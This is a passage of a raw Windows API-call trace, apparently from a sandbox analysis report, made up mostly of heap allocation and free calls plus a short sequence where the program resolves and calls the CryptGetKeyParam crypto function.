hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0184.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0184.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0184.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0184.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0184.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0184.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0184.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0184.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0184.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0184.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0184.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0184.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0184.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0184.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0184.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0184.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0184.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0184.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0184.619] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0184.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0184.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0184.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0184.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0184.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0184.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0184.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0184.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0184.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0184.620] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0184.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0184.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8a0 [0184.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0184.620] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0184.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0184.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0184.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0184.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0184.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0184.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0184.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0184.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0184.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0184.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0184.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0184.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0184.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0184.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0184.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0184.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0184.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0184.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0184.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0184.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0184.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0184.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0184.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0184.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0184.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0184.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0184.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0184.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0184.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0184.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0184.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0184.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0184.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0184.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0184.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0184.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0184.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0184.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0184.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0184.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0184.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0184.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0184.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0184.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0184.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0184.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0184.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0184.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0184.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0184.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0184.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0184.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0184.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0184.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0184.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0184.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0184.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0184.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0184.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0184.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0184.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0184.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0184.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0184.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0184.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0184.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0184.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0184.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0184.625] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0184.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0184.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0184.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0184.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0184.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0184.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0184.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0184.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0184.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0184.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0184.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0184.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0184.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0184.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0184.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0184.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0184.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0184.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0184.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0184.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0184.626] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0184.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0184.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0184.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0184.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0184.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0184.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0184.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0184.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0184.626] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2878, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2878*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | 